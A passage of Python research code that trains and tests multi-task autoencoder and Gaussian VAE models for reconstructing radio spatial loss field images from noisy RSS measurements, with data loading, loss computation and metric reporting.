elif noise_level == 'mid':
test_input_RSS1 = test_input_RSS1[500:1000]
test_denoise_RSS1 = test_denoise_RSS1[500:1000]
test_slf_img1 = test_slf_img1[500:1000]
test_ab1 = test_ab1[500:1000]
test_noise_level1 = test_noise_level1[500:1000]
elif noise_level == 'high':
test_input_RSS1 = test_input_RSS1[1000:]
test_denoise_RSS1 = test_denoise_RSS1[1000:]
test_slf_img1 = test_slf_img1[1000:]
test_ab1 = test_ab1[1000:]
test_noise_level1 = test_noise_level1[1000:]
else:
raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
test_input_RSS1 = torch.from_numpy(test_input_RSS1).float()
test_denoise_RSS1 = torch.from_numpy(test_denoise_RSS1).float()
test_slf_img1 = torch.from_numpy(test_slf_img1).float()
test_ab1 = torch.from_numpy(test_ab1).float()
test_noise_level1 = torch.from_numpy(test_noise_level1).long()
Test_Dataset_1 = TensorDataset(test_input_RSS1, test_denoise_RSS1, test_slf_img1, test_ab1, test_noise_level1)
return Test_Dataset_1
def load_testing_img2(self, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level='all'):
# Load testing data for image 2
testing_data2 = sio.loadmat('./data/testing_data_image2.mat')
# normalized noisy RSS measurement input (shape: [num_sample, NxPxP])
test_input_RSS2 = testing_data2['RSS']
test_input_RSS2 = (test_input_RSS2 - RSS_min) / (RSS_max - RSS_min)
test_input_RSS2 = test_input_RSS2.reshape(-1, self.args.N, self.args.P, self.args.P)
# normalized clean RSS measurement input (as target for decoder) (shape: [num_sample, NxPxP])
test_denoise_RSS2 = testing_data2['RSS_denoise']
test_denoise_RSS2 = (test_denoise_RSS2 - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
test_denoise_RSS2 = test_denoise_RSS2.reshape(-1, self.args.N, self.args.P, self.args.P)
# SLF image (shape: [1, K[0]*K[1]])
test_slf_img2 = testing_data2['slf_img']
test_slf_img2 = test_slf_img2.reshape(1, self.args.K0 * self.args.K1)
# SLF image (shape: [num_sample, K[0]*K[1]])
test_slf_img2 = np.tile(test_slf_img2, (test_input_RSS2.shape[0], 1))
# b: bias. alpha: path loss exponent. ab_norm: [b_norm, alpha_norm] (shape: [num_sample, N+1])
test_ab2 = testing_data2['ab_norm']
# noise level classes (shape: [num_sample, 1]) (classes: 0, 1, 2)
test_noise_level2 = testing_data2['sig_epsilon_class']
test_noise_level2 = np.squeeze(test_noise_level2)
if noise_level == 'all':
pass
elif noise_level == 'low':
test_input_RSS2 = test_input_RSS2[:500]
test_denoise_RSS2 = test_denoise_RSS2[:500]
test_slf_img2 = test_slf_img2[:500]
test_ab2 = test_ab2[:500]
test_noise_level2 = test_noise_level2[:500]
elif noise_level == 'mid':
test_input_RSS2 = test_input_RSS2[500:1000]
test_denoise_RSS2 = test_denoise_RSS2[500:1000]
test_slf_img2 = test_slf_img2[500:1000]
test_ab2 = test_ab2[500:1000]
test_noise_level2 = test_noise_level2[500:1000]
elif noise_level == 'high':
test_input_RSS2 = test_input_RSS2[1000:]
test_denoise_RSS2 = test_denoise_RSS2[1000:]
test_slf_img2 = test_slf_img2[1000:]
test_ab2 = test_ab2[1000:]
test_noise_level2 = test_noise_level2[1000:]
else:
raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
test_input_RSS2 = torch.from_numpy(test_input_RSS2).float()
test_denoise_RSS2 = torch.from_numpy(test_denoise_RSS2).float()
test_slf_img2 = torch.from_numpy(test_slf_img2).float()
test_ab2 = torch.from_numpy(test_ab2).float()
test_noise_level2 = torch.from_numpy(test_noise_level2).long()
Test_Dataset_2 = TensorDataset(test_input_RSS2, test_denoise_RSS2, test_slf_img2, test_ab2, test_noise_level2)
return Test_Dataset_2
def train(self, model, train_loader, optimizer, epoch):
model.train()
train_loss = 0 # total loss
train_loss_task0 = 0 # loss for reconstruct RSS
train_loss_task1 = 0 # loss for SLF image estimation
train_loss_task2 = 0 # loss for parameters estimation
train_loss_task3 = 0 # loss for noise level prediction
train_acc = 0 # accuracy for noise level prediction
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(train_loader):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
optimizer.zero_grad()
RSS, SLF, ab, noise_level = model(input_RSS)
loss_task0 = F.binary_cross_entropy(RSS, target_RSS, reduction='sum')/(self.args.N * self.args.P * self.args.P)
loss_task1 = F.binary_cross_entropy(SLF, target_SLF, reduction='sum')/(self.args.K0 * self.args.K1)
loss_task2 = F.binary_cross_entropy(ab, target_ab, reduction='sum')/(self.args.N + 1)
loss_task3 = F.cross_entropy(noise_level, target_noise_level, reduction='sum')
loss = self.args.lambda1 * loss_task0 + self.args.lambda2 * loss_task1 \
+ self.args.lambda3 * loss_task2 + self.args.lambda4 * loss_task3
train_loss += loss.item()
train_loss_task0 += loss_task0.item()
train_loss_task1 += loss_task1.item()
train_loss_task2 += loss_task2.item()
train_loss_task3 += loss_task3.item()
_, noise_pred = torch.max(noise_level, 1)
acc_task3 = (noise_pred == target_noise_level).sum()
train_acc += acc_task3.item()
loss /= input_RSS.size(0)
loss.backward()
optimizer.step()
if batch_idx % self.args.log_interval == 0:
print(
'Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}\tLoss0: {:.6f}\tLoss1: {:.6f}\tLoss2: {:.6f}\tLoss3: {:.6f}\tAcc: {:.6f}'.format(
epoch, batch_idx * len(input_RSS), len(train_loader.dataset),
100. * batch_idx / len(train_loader),
loss.item(),
loss_task0.item() / len(input_RSS), loss_task1.item() / len(input_RSS),
loss_task2.item() / len(input_RSS), loss_task3.item() / len(input_RSS), acc_task3.item() / len(input_RSS)))
train_loss /= len(train_loader.dataset)
train_loss_task0 /= len(train_loader.dataset)
train_loss_task1 /= len(train_loader.dataset)
train_loss_task2 /= len(train_loader.dataset)
train_loss_task3 /= len(train_loader.dataset)
train_acc /= len(train_loader.dataset)
print('====> Epoch: {} Average loss: {:.6f}'.format(epoch, train_loss))
print('====> RSS loss: {:.6f}'.format(train_loss_task0))
print('====> SLF loss: {:.6f}'.format(train_loss_task1))
print('====> ab loss: {:.6f}'.format(train_loss_task2))
print('====> noise level loss: {:.6f}'.format(train_loss_task3))
print('====> noise level Accuracy: {:.4f}'.format(train_acc))
return train_loss, train_loss_task0, train_loss_task1, train_loss_task2, train_loss_task3, train_acc
def validate(self, model, val_loader):
model.eval()
val_loss = 0 # total loss
val_rmse_slf = 0 # slf reconstruction loss
val_mae_slf = 0 # slf reconstruction loss
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(val_loader):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
RSS, SLF, ab, noise_level = model(input_RSS)
loss_task0 = F.binary_cross_entropy(RSS, target_RSS, reduction='sum')/(self.args.N * self.args.P * self.args.P)
loss_task1 = F.binary_cross_entropy(SLF, target_SLF, reduction='sum')/(self.args.K0 * self.args.K1)
loss_task2 = F.binary_cross_entropy(ab, target_ab, reduction='sum')/(self.args.N + 1)
loss_task3 = F.cross_entropy(noise_level, target_noise_level, reduction='sum')
loss = self.args.lambda1 * loss_task0 + self.args.lambda2 * loss_task1 \
+ self.args.lambda3 * loss_task2 + self.args.lambda4 * loss_task3
val_loss += loss.item()
slf_mse = F.mse_loss(SLF, target_SLF, reduction='sum')/(self.args.K0 * self.args.K1)
slf_mae = F.l1_loss(SLF, target_SLF, reduction='sum')/(self.args.K0 * self.args.K1)
val_rmse_slf += slf_mse.item()
val_mae_slf += slf_mae.item()
val_loss /= len(val_loader.dataset)
val_rmse_slf /= len(val_loader.dataset)
val_rmse_slf = np.sqrt(val_rmse_slf)
val_mae_slf /= len(val_loader.dataset)
print('====> Validation set loss: {:.6f}'.format(val_loss))
print('====> Validation set SLF rmse: {:.6f}'.format(val_rmse_slf))
print('====> Validation set SLF mae: {:.6f}'.format(val_mae_slf))
return val_loss, val_rmse_slf, val_mae_slf
def test(self, model, test_loader):
model.eval()
test_loss = 0 # total loss
test_loss_task0 = 0 # loss for reconstruct RSS
test_loss_task1 = 0 # loss for SLF image estimation
test_loss_task2 = 0 # loss for parameters estimation
test_loss_task3 = 0 # loss for noise level prediction
with torch.no_grad():
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(test_loader):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
RSS, SLF, ab, noise_level = model(input_RSS)
loss_task0 = F.binary_cross_entropy(RSS, target_RSS, reduction='sum') / (
self.args.N * self.args.P * self.args.P)
loss_task1 = F.binary_cross_entropy(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)
loss_task2 = F.binary_cross_entropy(ab, target_ab, reduction='sum') / (self.args.N + 1)
loss_task3 = F.cross_entropy(noise_level, target_noise_level, reduction='sum')
loss = self.args.lambda1 * loss_task0 + self.args.lambda2 * loss_task1 \
+ self.args.lambda3 * loss_task2 + self.args.lambda4 * loss_task3
test_loss += loss.item()
test_loss_task0 += loss_task0.item()
test_loss_task1 += loss_task1.item()
test_loss_task2 += loss_task2.item()
test_loss_task3 += loss_task3.item()
test_loss /= len(test_loader.dataset)
test_loss_task0 /= len(test_loader.dataset)
test_loss_task1 /= len(test_loader.dataset)
test_loss_task2 /= len(test_loader.dataset)
test_loss_task3 /= len(test_loader.dataset)
test_acc = self.test_accuracy(model, test_loader)
print('====> Test set loss: {:.6f}'.format(test_loss))
print('====> Test set RSS loss: {:.6f}'.format(test_loss_task0))
print('====> Test set SLF loss: {:.6f}'.format(test_loss_task1))
print('====> Test set ab loss: {:.6f}'.format(test_loss_task2))
print('====> Test set noise level loss: {:.6f}'.format(test_loss_task3))
print('====> Test set noise level Accuracy: {:.4f}'.format(test_acc))
return test_loss, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc
def train_save(self):
model = MAE(M=self.args.M, P=self.args.P, K=(self.args.K0, self.args.K1))
def weights_init(m):
if isinstance(m, torch.nn.Linear) or isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.ConvTranspose2d):
torch.nn.init.xavier_uniform_(m.weight.data)
if m.bias is not None:
torch.nn.init.zeros_(m.bias.data)
model.apply(weights_init)
model = model.to(self.device)
summary(model, input_size=(self.args.batch_size, self.args.N, self.args.P, self.args.P))
train_loader, val_loader, test_loader, test_loader1, test_loader2 = self.load_data()
optimizer = self.get_optimizer(model.parameters())
scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min', factor=0.25, patience=10, min_lr=1e-5)
train_set = []
val_set = []
test_set = [] # for test set
test_set1 = [] # for test image 1
test_set2 = [] # for test image 2
train_loss_path = self.path + 'train_loss_' + str(self.args.n_epochs) + '.npy'
val_loss_path = self.path + 'val_loss_' + str(self.args.n_epochs) + '.npy'
test_loss_path = self.path + 'test_loss_' + str(self.args.n_epochs) + '.npz'
model_path = self.path + 'model_' + str(self.args.n_epochs) + '.pth'
current_val_slf_loss = np.inf
for epoch in range(1, self.args.n_epochs+1):
print("Epoch %d learning rate:%f" % (epoch, optimizer.param_groups[0]['lr']))
train_loss, train_loss_task0, train_loss_task1, train_loss_task2, train_loss_task3, train_acc = self.train(model,
train_loader,
optimizer,
epoch)
train_set.append([train_loss, train_loss_task0, train_loss_task1, train_loss_task2, train_loss_task3, train_acc])
print('====> Validation Loss for Epoch {:d}'.format(epoch))
val_loss, val_slf_rmse, val_slf_mae = self.validate(model, val_loader)
val_set.append([val_loss, val_slf_rmse, val_slf_mae])
scheduler.step(val_loss)
print('====> Test for Epoch {:d}'.format(epoch))
test_loss, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc = self.test(model,
test_loader)
test_set.append([test_loss, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc])
print('====> Test Image1 for Epoch {:d}'.format(epoch))
test_loss, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc = self.test(model,
test_loader1)
test_set1.append([test_loss, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc])
print('====> Test Image2 for Epoch {:d}'.format(epoch))
test_loss, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc = self.test(model,
test_loader2)
test_set2.append([test_loss, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc])
if epoch % self.args.save_freq == 0:
ckpt_path = self.path + '/model_' + str(epoch) + '.pth'
torch.save(model.state_dict(), ckpt_path)
print('checkpoint{}.pth saved!'.format(epoch))
if val_slf_mae < current_val_slf_loss:
torch.save(model.state_dict(), model_path)
current_val_slf_loss = val_slf_mae
train_loss = np.asarray(train_set).reshape(-1, 6)
val_loss = np.asarray(val_set).reshape(-1, 3)
test_loss = np.asarray(test_set).reshape(-1, 6)
test_loss1 = np.asarray(test_set1).reshape(-1, 6)
test_loss2 = np.asarray(test_set2).reshape(-1, 6)
np.save(train_loss_path, train_loss)
np.save(val_loss_path, val_loss)
np.savez(test_loss_path, test_loss=test_loss, test_loss1=test_loss1, test_loss2=test_loss2)
def test_accuracy(self, model, test_loader):
model.eval()
acc = 0
for i, (input_RSS, *_, target_noise_level) in enumerate(test_loader):
input_RSS = input_RSS.to(self.device)
*_, noise_pred = model(input_RSS) # noise_pred: [batch_size, 3]
noise_pred = noise_pred.detach().cpu().numpy()
noise_pred = np.argmax(noise_pred, axis=1)
labels = target_noise_level.detach().cpu().numpy()
acc += np.sum((noise_pred == labels).astype(int))
acc /= len(test_loader.dataset)
return acc
def test_model(self, noise_level='all'):
model = MAE(M=self.args.M, P=self.args.P, K=(self.args.K0, self.args.K1))
model = model.to(self.device)
model_path = self.path + 'model_' + str(self.args.n_epochs) + '.pth'
model.load_state_dict(torch.load(model_path, map_location=self.device))
model.eval()
*_, test_loader, test_loader1, test_loader2 = self.load_data(noise_level)
noise_class = 0 # noise_class = 0 stands for all noise classes
if noise_level == 'low':
noise_class = 1
elif noise_level == 'mid':
noise_class = 2
elif noise_level == 'high':
noise_class = 3
# test model for testing set
slf_rmse = 0
slf_mae = 0
ab_rmse = 0
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(
test_loader):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
RSS, SLF, ab, noise_pred = model(input_RSS)
# plot SLF reconstruction image for image1
n = min(target_RSS.size(0), 8)
comparison = torch.cat([target_SLF.view(target_RSS.size(0), 1, self.args.K0, self.args.K1)[:n],
SLF.view(SLF.size(0), 1, self.args.K0, self.args.K1)[:n]])
save_image(comparison.cpu(),
self.path + 'reconstruction_SLF_noise' + str(noise_class) + '_' + str(batch_idx) + '.png',
nrow=n)
# test SLF image RMSE
slf_rmse += F.mse_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test SLF image MAE
slf_mae += F.l1_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test ab parameters RMSE
ab_rmse += F.mse_loss(ab, target_ab, reduction='sum').item() / (self.args.N + 1)
slf_rmse /= len(test_loader.dataset)
slf_rmse = np.sqrt(slf_rmse)
slf_mae /= len(test_loader.dataset)
ab_rmse /= len(test_loader.dataset)
ab_rmse = np.sqrt(ab_rmse)
noise_acc = self.test_accuracy(model, test_loader)
print('====> Test for Testing Set:')
print('====> Noise_level: ' + noise_level)
print('====> Test set SLF rmse: {:.6f}'.format(slf_rmse))
print('====> Test set SLF mae: {:.6f}'.format(slf_mae))
print('====> Test set ab rmse: {:.6f}'.format(ab_rmse))
print('====> Test set noise level Accuracy: {:.4f}'.format(noise_acc))
# # test model for image 1
# slf_rmse = 0
# slf_mae = 0
# ab_rmse = 0
# for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(test_loader1):
# input_RSS = input_RSS.to(self.device)
# target_RSS = target_RSS.to(self.device)
# target_SLF = target_SLF.to(self.device)
# target_ab = target_ab.to(self.device)
# target_noise_level = target_noise_level.to(self.device)
# RSS, SLF, ab, noise_pred = model(input_RSS)
# # plot SLF reconstruction image for image1
# n = min(target_RSS.size(0), 8)
# comparison = torch.cat([target_SLF.view(target_RSS.size(0), 1, self.args.K0, self.args.K1)[:n],
# SLF.view(SLF.size(0), 1, self.args.K0, self.args.K1)[:n]])
# save_image(comparison.cpu(),
# self.path + 'reconstruction_SLF1_noise' + str(noise_class) + '_' + str(batch_idx) + '.png',
# nrow=n)
# # test SLF image RMSE
# slf_rmse += F.mse_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# # test SLF image MAE
# slf_mae += F.l1_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# # test ab parameters RMSE
# ab_rmse += F.mse_loss(ab, target_ab, reduction='sum').item() / (self.args.N + 1)
#
# slf_rmse /= len(test_loader1.dataset)
# slf_rmse = np.sqrt(slf_rmse)
# slf_mae /= len(test_loader1.dataset)
# ab_rmse /= len(test_loader1.dataset)
# ab_rmse = np.sqrt(ab_rmse)
# noise_acc = self.test_accuracy(model, test_loader1)
# print('====> Test for image 1:')
# print('====> Noise_level: ' + noise_level)
# print('====> Test set SLF rmse: {:.6f}'.format(slf_rmse))
# print('====> Test set SLF mae: {:.6f}'.format(slf_mae))
# print('====> Test set ab rmse: {:.6f}'.format(ab_rmse))
# print('====> Test set noise level Accuracy: {:.4f}'.format(noise_acc))
#
# # test model for image 2
# slf_rmse = 0
# slf_mae = 0
# ab_rmse = 0
# for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(test_loader2):
# input_RSS = input_RSS.to(self.device)
# target_RSS = target_RSS.to(self.device)
# target_SLF = target_SLF.to(self.device)
# target_ab = target_ab.to(self.device)
# target_noise_level = target_noise_level.to(self.device)
# RSS, SLF, ab, noise_pred = model(input_RSS)
# # plot SLF reconstruction image for image1
# n = min(target_RSS.size(0), 8)
# comparison = torch.cat([target_SLF.view(target_RSS.size(0), 1, self.args.K0, self.args.K1)[:n],
# SLF.view(SLF.size(0), 1, self.args.K0, self.args.K1)[:n]])
# save_image(comparison.cpu(),
# self.path + 'reconstruction_SLF2_noise' + str(noise_class) + '_' + str(batch_idx) + '.png',
# nrow=n)
# # test SLF image RMSE
# slf_rmse += F.mse_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# # test SLF image MAE
# slf_mae += F.l1_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# # test ab parameters RMSE
# ab_rmse += F.mse_loss(ab, target_ab, reduction='sum').item() / (self.args.N + 1)
#
# slf_rmse /= len(test_loader2.dataset)
# slf_rmse = np.sqrt(slf_rmse)
# slf_mae /= len(test_loader2.dataset)
# ab_rmse /= len(test_loader2.dataset)
# ab_rmse = np.sqrt(ab_rmse)
# noise_acc = self.test_accuracy(model, test_loader2)
# print('====> Test for image 2:')
# print('====> Noise_level: ' + noise_level)
# print('====> Test set SLF rmse: {:.6f}'.format(slf_rmse))
# print('====> Test set SLF mae: {:.6f}'.format(slf_mae))
# print('====> Test set ab rmse: {:.6f}'.format(ab_rmse))
# print('====> Test set noise level Accuracy: {:.4f}'.format(noise_acc))
def load_data_metrics(self, noise_level='all'):
# Load training data
training_data = sio.loadmat('./data/training_data.mat')
# normalized noisy RSS measurement input (shape: [num_sample, NxPxP])
train_input_RSS = training_data['RSS']
RSS_max = np.amax(train_input_RSS, axis=0, keepdims=True)
RSS_min = np.amin(train_input_RSS, axis=0, keepdims=True)
# normalized clean RSS measurement input (as target for decoder) (shape: [num_sample, NxPxP])
train_denoise_RSS = training_data['RSS_denoise']
RSS_denoise_max = np.amax(train_denoise_RSS, axis=0, keepdims=True)
RSS_denoise_min = np.amin(train_denoise_RSS, axis=0, keepdims=True)
# Load testing data
testing_data = sio.loadmat('./data/testing_samples1.mat') # sio.loadmat('./data/testing_data_YOLO/mat_file2/testing_YOLO_data.mat')
# noise level classes (shape: [num_sample, 1]) (classes: 0, 1, 2)
test_noise_class = testing_data['sig_epsilon_class']
test_noise_class = np.squeeze(test_noise_class)
idx = (test_noise_class == 0) | (test_noise_class == 1) | (test_noise_class == 2)
if noise_level == 'all':
pass
elif noise_level == 'low':
idx = (test_noise_class == 0)
elif noise_level == 'mid':
idx = (test_noise_class == 1)
elif noise_level == 'high':
idx = (test_noise_class == 2)
else:
raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
test_noise_class = test_noise_class[idx]
# normalized noisy RSS measurement input (shape: [num_sample, NxPxP])
test_input_RSS = testing_data['RSS'][idx]
test_input_RSS = (test_input_RSS - RSS_min) / (RSS_max - RSS_min)
test_input_RSS = test_input_RSS.reshape(-1, self.args.N, self.args.P, self.args.P)
# normalized clean RSS measurement input (as target for decoder) (shape: [num_sample, NxPxP])
test_denoise_RSS = testing_data['RSS_denoise'][idx]
test_denoise_RSS = (test_denoise_RSS - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
test_denoise_RSS = test_denoise_RSS.reshape(-1, self.args.N, self.args.P, self.args.P)
# SLF image (shape: [1, K[0]*K[1]])
test_slf_img = testing_data['slf_img'][idx]
test_slf_img = test_slf_img.reshape(-1, self.args.K0 * self.args.K1)
# b: bias. alpha: path loss exponent. ab_norm: [b_norm, alpha_norm] (shape: [num_sample, N+1])
test_ab = testing_data['ab_norm'][idx]
test_input_RSS = torch.from_numpy(test_input_RSS).float()
test_denoise_RSS = torch.from_numpy(test_denoise_RSS).float()
test_slf_img = torch.from_numpy(test_slf_img).float()
test_ab = torch.from_numpy(test_ab).float()
test_noise_class = torch.from_numpy(test_noise_class).long()
Test_Dataset = TensorDataset(test_input_RSS, test_denoise_RSS, test_slf_img, test_ab, test_noise_class)
test_loader = DataLoader(
Test_Dataset,
batch_size=self.args.batch_size, shuffle=False, num_workers=2)
print("Data Loaded for testing metrics!")
return test_loader
def test_model_ROC(self, noise_level='all'):
model = MAE(M=self.args.M, P=self.args.P, K=(self.args.K0, self.args.K1))
model = model.to(self.device)
model_path = self.path + 'model_' + str(self.args.n_epochs) + '.pth'
model.load_state_dict(torch.load(model_path, map_location=self.device))
model.eval()
test_loader = self.load_data_metrics(noise_level)
noise_class = 0 # noise_class = 0 stands for all noise classes
if noise_level == 'low':
noise_class = 1
elif noise_level == 'mid':
noise_class = 2
elif noise_level == 'high':
noise_class = 3
# test model for testing set
slf_rmse = 0
slf_mae = 0
labels = list()
preds = list()
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(
test_loader):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
RSS, SLF, ab, noise_pred = model(input_RSS)
# test SLF image RMSE
slf_rmse += F.mse_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test SLF image MAE
slf_mae += F.l1_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
labels.append(target_SLF.detach().cpu().numpy())
preds.append(SLF.detach().cpu().numpy())
slf_rmse /= len(test_loader.dataset)
slf_rmse = np.sqrt(slf_rmse)
slf_mae /= len(test_loader.dataset)
print('====> Test for Testing Set:')
print('====> Noise_level: ' + noise_level)
print('====> Test set SLF rmse: {:.6f}'.format(slf_rmse))
print('====> Test set SLF mae: {:.6f}'.format(slf_mae))
preds = np.concatenate(preds, axis=0)
np.save('results/MAE/ROC_data/mae_preds_' + noise_level + '.npy', preds)
def estimate(self, noise_level='low'):
if noise_level != 'low' and noise_level != 'mid' and noise_level != 'high' :
raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
model = MAE(M=self.args.M, P=self.args.P, K=(self.args.K0, self.args.K1))
model = model.to(self.device)
model_path = self.path + 'model_' + str(self.args.n_epochs) + '.pth'
model.load_state_dict(torch.load(model_path, map_location=self.device))
model.eval()
test_loader = self.load_data_metrics(noise_level)
path_model = self.path + 'YOLO/Origin/images/mae/' + noise_level + '/'
if not os.path.exists(path_model):
os.makedirs(path_model)
print('====> Test Model with estimation:')
print('====> Noise Level: ' + noise_level)
thr = 0.4
# test model
for batch_idx, (input_rss, _, target_slf, *_) in enumerate(test_loader):
input_rss = input_rss.to(self.device)
target_slf = target_slf.to(self.device)
_, slf_recon, *_ = model(input_rss)
slf_recon = slf_recon.detach().cpu().numpy()
for idx in range(len(target_slf)):
estimator_img = slf_recon[idx, :].reshape(self.args.K0, self.args.K1)
# estimator_img[estimator_img > thr] = 1
# estimator_img[estimator_img <= thr] = 0
estimator_img = cv2.resize(estimator_img, (320, 320), interpolation=cv2.INTER_NEAREST)*255
cv2.imwrite(path_model + 'im' + str(idx+batch_idx*self.args.batch_size+1) +'.jpg', estimator_img)
image = cv2.imread(path_model + 'im' + str(1) +'.jpg', cv2.IMREAD_GRAYSCALE)
# runner for Multi-task Gaussian VAE
class MGVAE_runner():
def __init__(self, args):
self.args = args
cuda_flag = not self.args.no_cuda and torch.cuda.is_available()
self.device = torch.device("cuda" if cuda_flag else "cpu")
torch.manual_seed(self.args.seed)
random.seed(self.args.seed)
self.path = self.args.run + 'MGVAE/'
if not os.path.exists(self.path):
os.makedirs(self.path)
def get_optimizer(self, parameters):
if self.args.optimizer == 'Adam':
return optim.Adam(parameters, lr=self.args.lr, weight_decay=self.args.weight_decay, betas=(0.9, 0.999), eps=1e-7)
elif self.args.optimizer == 'RMSProp':
return optim.RMSprop(parameters, lr=self.args.lr, weight_decay=self.args.weight_decay)
elif self.args.optimizer == 'SGD':
return optim.SGD(parameters, lr=self.args.lr, momentum=0.9)
else:
raise NotImplementedError('Optimizer {} not understood.'.format(self.args.optimizer))
def load_data(self, noise_level='all'):
dataset, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min = self.load_training_data()
train_size = int(len(dataset) * 0.9)
val_size = int(len(dataset) * 0.1)
dataset_train, dataset_val = random_split(dataset, [train_size, val_size],
generator=torch.Generator().manual_seed(self.args.seed))
dataset_test = self.load_testing_data(RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level)
dataset_test1 = self.load_testing_img1(RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level)
dataset_test2 = self.load_testing_img2(RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level)
train_loader = DataLoader(
dataset_train,
batch_size=self.args.batch_size, shuffle=True, num_workers=2)
val_loader = DataLoader(
dataset_val,
batch_size=self.args.batch_size, shuffle=True, num_workers=2)
test_loader = DataLoader(
dataset_test,
batch_size=self.args.batch_size, shuffle=False, num_workers=2)
test_loader1 = DataLoader(
dataset_test1,
batch_size=self.args.batch_size, shuffle=False, num_workers=2)
test_loader2 = DataLoader(
dataset_test2,
batch_size=self.args.batch_size, shuffle=False, num_workers=2)
print("Data Loaded!")
return train_loader, val_loader, test_loader, test_loader1, test_loader2
def load_training_data(self):
# Load training data
training_data = sio.loadmat('./data/training_data.mat')
# normalized noisy RSS measurement input (shape: [num_sample, NxPxP])
train_input_RSS = training_data['RSS']
RSS_max = np.amax(train_input_RSS, axis=0, keepdims=True)
RSS_min = np.amin(train_input_RSS, axis=0, keepdims=True)
train_input_RSS = (train_input_RSS - RSS_min) / (RSS_max - RSS_min)
train_input_RSS = train_input_RSS.reshape(-1, self.args.N, self.args.P, self.args.P)
# normalized clean RSS measurement input (as target for decoder) (shape: [num_sample, NxPxP])
train_denoise_RSS = training_data['RSS_denoise']
RSS_denoise_max = np.amax(train_denoise_RSS, axis=0, keepdims=True)
RSS_denoise_min = np.amin(train_denoise_RSS, axis=0, keepdims=True)
train_denoise_RSS = (train_denoise_RSS - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
train_denoise_RSS = train_denoise_RSS.reshape(-1, self.args.N, self.args.P, self.args.P)
# SLF image (shape: [num_sample, K[0]*K[1]])
train_slf_img = training_data['slf_img']
train_slf_img = train_slf_img.reshape(-1, self.args.K0 * self.args.K1)
# b: bias. alpha: path loss exponent. ab_norm: [b_norm, alpha_norm] (shape: [num_sample, N+1])
train_ab = training_data['ab_norm']
# noise level classes (shape: [num_sample, 1]) (classes: 0, 1, 2)
train_noise_level = training_data['sig_epsilon_class']
train_noise_level = np.squeeze(train_noise_level)
train_input_RSS = torch.from_numpy(train_input_RSS).float()
train_denoise_RSS = torch.from_numpy(train_denoise_RSS).float()
train_slf_img = torch.from_numpy(train_slf_img).float()
train_ab = torch.from_numpy(train_ab).float()
train_noise_level = torch.from_numpy(train_noise_level).long()
Train_Dataset = TensorDataset(train_input_RSS, train_denoise_RSS, train_slf_img, train_ab, train_noise_level)
return Train_Dataset, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min
def load_testing_data(self, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level='all'):
# Load testing data
testing_data = sio.loadmat('./data/testing_data.mat')
# noise level classes (shape: [num_sample, 1]) (classes: 0, 1, 2)
test_noise_class = testing_data['sig_epsilon_class']
test_noise_class = np.squeeze(test_noise_class)
idx = (test_noise_class == 0) | (test_noise_class == 1) | (test_noise_class == 2)
if noise_level == 'all':
pass
elif noise_level == 'low':
idx = (test_noise_class == 0)
elif noise_level == 'mid':
idx = (test_noise_class == 1)
elif noise_level == 'high':
